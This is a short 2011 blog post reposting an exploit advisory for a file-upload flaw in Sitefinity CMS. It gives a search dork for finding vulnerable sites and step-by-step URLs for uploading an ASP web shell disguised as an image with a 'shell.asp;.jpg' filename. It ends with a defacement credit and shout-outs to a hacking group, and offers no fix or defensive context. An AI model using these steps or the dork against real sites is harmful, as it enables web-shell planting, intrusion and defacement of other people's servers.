Friday, April 1, 2011

Sitefinity CMS (ASP.NET) Upload Vulnerability

# Exploit Title: Sitefinity CMS (ASP.NET) Upload Vulnerability
# DDate: 16/11/2010
# Author: Net.Edit0r
# Software Link: www.sitefinity.com
# Version: 3.x . 4.0
# Tested on: windows SP2 Francais V.(Pnx2 2.0)
# dork : “Sitefinity: Login”

exploit # /UserControls/Dialogs/ImageEditorDialog.aspx

first go to # http://site.com/sitefinity/

then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
Upload to # http://site.com/Images/[shell]


Deface By Mhiman : http://steemer-online.com/mhiman.htm


Thank's For Jundab

No comments:

Template by : mhiman@ hacker-newbie.org